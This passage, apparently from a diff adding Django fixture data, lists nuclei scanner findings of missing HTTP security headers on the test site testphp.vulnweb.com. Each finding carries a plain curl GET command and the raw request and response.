"https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Edg/86.0.622.69' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L", + "discovered_date": "2024-11-13T02:41:37.424Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1/3L HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Edg/86.0.622.69\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:32 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Network Storage D-Link DNS-313 enclosure 1 x SATA</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 645, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Edg/86.0.622.69' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L", + "discovered_date": "2024-11-13T02:41:37.577Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1/3L HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Edg/86.0.622.69\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:32 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Network Storage D-Link DNS-313 enclosure 1 x SATA</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 646, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3", + "discovered_date": "2024-11-13T02:41:37.726Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 647, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1", + "discovered_date": "2024-11-13T02:41:37.887Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 648, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01", + "discovered_date": "2024-11-13T02:41:38.115Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2/A01 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Web Camera A4Tech PK-335E</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 649, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1", + "discovered_date": "2024-11-13T02:41:38.272Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 650, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01", + "discovered_date": "2024-11-13T02:41:38.434Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2/A01 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Web Camera A4Tech PK-335E</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 651, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1", + "discovered_date": "2024-11-13T02:41:38.597Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 652, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.53' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L", + "discovered_date": "2024-11-13T02:41:38.761Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2/3L HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.53\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Web Camera A4Tech PK-335E</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 653, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1", + "discovered_date": "2024-11-13T02:41:38.912Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 654, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.53' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L", + "discovered_date": "2024-11-13T02:41:39.076Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2/3L HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.53\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Web Camera A4Tech PK-335E</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 655, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2", + "discovered_date": "2024-11-13T02:41:39.226Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 656, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3", + "discovered_date": "2024-11-13T02:41:39.383Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3/3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Laser Color Printer HP LaserJet M551dn, A4</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 657, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.54' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01", + "discovered_date": "2024-11-13T02:41:39.541Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1/A01 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.54\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Network Storage D-Link DNS-313 enclosure 1 x 